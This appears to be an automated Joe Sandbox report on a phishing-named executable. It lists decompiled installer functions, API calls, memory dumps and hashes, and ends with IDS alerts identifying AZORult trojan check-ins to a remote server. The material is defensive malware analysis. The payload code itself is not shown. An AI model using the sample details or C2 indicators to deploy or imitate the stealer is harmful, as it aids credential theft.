Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405BFE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BFE(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B80(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405c07
0x00405c0e
0x00405c11
0x00405c13
0x00405c19
0x00405c31
0x00405c53
0x00000000
0x00405c39
0x00405c3b
0x00405c3c
0x00405c3f
0x00405c40
0x00405c49
0x00000000
0x00000000
0x00405c4c
0x00405c4f
0x00000000
0x00000000
0x00000000
0x00405c4f
0x00000000
0x00405c3c
0x00405c28
0x00000000
0x00405c29

APIs

CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,76203420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76203420,00000000), ref: 00405C0C
CharNextW.USER32(00000000), ref: 00405C11
CharNextW.USER32(00000000), ref: 00405C29

Strings

C:\, xrefs: 00405BFF

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction ID: 71472b9638db6d5cc2cef3a2d8db9d1c11fc55a0834b756b62a4f8b04705d027
Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction Fuzzy Hash: B7F09662908F1555FF317A945C45ABB57B8DB54BA0B00C83BD602B72C0E3B85CC58E9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405B53 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405B53(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405b54
0x00405b61
0x00405b62
0x00405b6d
0x00405b75
0x00405b75
0x00405b7d

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76203420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76203420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
lstrcatW.KERNEL32(?,0040A014), ref: 00405B75

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E5D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x422a00; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434ef0;
						if(_t2 >  *0x434ef0) {
							_t3 = CreateDialogParamW( *0x434ee0, 0x6f, 0, E00402DD7, 0);
							 *0x422a00 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406698(0);
					}
				} else {
					_t6 =  *0x422a00; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x422a00 = 0;
					return _t6;
				}
			}

0x00402e64
0x00402e7e
0x00402e84
0x00402e8e
0x00402e94
0x00402e9a
0x00402eab
0x00402eb4
0x00000000
0x00402eb9
0x00402ec0
0x00402e86
0x00402e8d
0x00402e8d
0x00402e66
0x00402e66
0x00402e6d
0x00402e70
0x00402e70
0x00402e76
0x00402e7d
0x00402e7d

APIs

DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
GetTickCount.KERNEL32 ref: 00402E8E
CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC

Uniqueness

Uniqueness Score: -1.00%

Function 004038FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038FB() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b20c;
				_t3 = E004038E0(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b20c =  *0x42b20c & 0x00000000;
				return _t3;
			}

0x004038fc
0x00403904
0x0040390b
0x0040390e
0x0040390e
0x00403910
0x00403915
0x0040391c
0x00403922
0x00403926
0x00403927
0x0040392f

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76203420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
GlobalFree.KERNEL32(?), ref: 0040391C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405B9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405B9F(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405ba0
0x00405baa
0x00405bad
0x00405bb3
0x00405bb4
0x00405bb5
0x00405bbd
0x00000000
0x00000000
0x00000000
0x00405bbd
0x00405bbf
0x00405bc7

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5

Strings

C:\Users\user\Desktop, xrefs: 00405B9F

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000001.00000002.7936337323.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.7936306097.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936376155.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936411270.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405CD9 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CD9(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405ce9
0x00405ceb
0x00405cee
0x00405d1a
0x00405cf3
0x00405cfc
0x00405d01
0x00405d0c
0x00405d0f
0x00405d2b
0x00405d11
0x00405d18
0x00000000
0x00405d18
0x00405d24
0x00405d28
0x00405d28
0x00405d22
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Swift Mesaj#U0131#09971.exePID: 3172, Parent PID: 7596COMMON

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	2
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 016848EC Relevance: 1.6, APIs: 1, Instructions: 98
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 016848F6

Memory Dump Source

Source File: 00000004.00000002.8059170486.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1660000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 218f4971015fdc136fa660e6043985f48f76255a2ad780079294706a95b206ad
Instruction ID: 28eb006d6cd13aa4f8691928b45ba35d13f82d375cfe7cae987547b215776e2e
Opcode Fuzzy Hash: 218f4971015fdc136fa660e6043985f48f76255a2ad780079294706a95b206ad
Instruction Fuzzy Hash: B931D4252047C68ADF306E798DA43EB3BA59F52350F99476ECCD68B1DAE3348581CB13

Uniqueness

Uniqueness Score: -1.00%

Source: Traffic	Snort IDS: 2029468 ET TROJAN Win32/AZORult V3.3 Client Checkin M15 192.168.11.20:49836 -> 172.67.203.65:80
Source: Traffic	Snort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 172.67.203.65:80 -> 192.168.11.20:49836

Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://LOGIN.LIVE.COM/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr, nssdbm3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
